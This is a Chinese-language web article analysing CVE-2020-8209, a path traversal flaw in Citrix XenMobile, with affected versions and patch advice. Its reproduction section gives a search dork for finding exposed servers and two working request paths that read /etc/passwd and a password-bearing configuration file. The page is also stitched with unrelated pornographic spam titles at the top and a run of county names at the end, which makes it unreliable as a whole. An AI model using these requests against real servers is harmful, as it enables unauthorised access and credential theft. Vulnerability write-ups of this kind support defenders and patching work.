亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

XenMobile中CVE-2020-8209漏洞的示例分析

發布時間:2021-12-28 17:33:35 來源:億速云 閱讀:127 作者:柒染 欄目:安全技術

這期內容當中小編將會給大家帶來有關XenMobile中CVE-2020-8209漏洞的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

1、漏洞介紹

XenMobile是Citrix開發的企業移動性管理軟件,該產品允許企業管理員工的移動設備和移動應用程序,該軟件的目的是通過允許員工安全地在企業擁有的和個人移動設備及應用程序上工作來提高生產率。CVE-2020-8209,路徑遍歷漏洞。此漏洞允許未經授權的用戶讀取任意文件,包括包含密碼的配置文件。(該軟件國外居多,國內基本很少)

2、漏洞版本

RP2之前的XenMobile服務器10.12
RP4之前的XenMobile服務器10.11
RP6之前的XenMobile服務器10.10
10.9 RP5之前的XenMobile服務器

3、漏洞復現

1.通過空間引擎關鍵字

"XenMobile控制臺"

XenMobile中CVE-2020-8209漏洞的示例分析

2.POC驗證漏洞

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

XenMobile中CVE-2020-8209漏洞的示例分析

XenMobile中CVE-2020-8209漏洞的示例分析

4、漏洞建議

官方補丁刪除了/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp

上述就是小編為大家分享的XenMobile中CVE-2020-8209漏洞的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

孟州市| 凉城县| 闵行区| 清河县| 大渡口区| 通化县| 贞丰县| 固镇县| 交城县| 和林格尔县| 什邡市| 海城市| 东明县| 色达县| 徐闻县| 瑞丽市| 邹城市| 百色市| 清水县| 广灵县| 宜良县| 台南县| 虹口区| 衢州市| 浏阳市| 吉木乃县| 巨鹿县| 安新县| 教育| 家居| 绿春县| 富源县| 沂源县| 广元市| 大埔县| 郎溪县| 本溪市| 南木林县| 西昌市| 富裕县| 大姚县|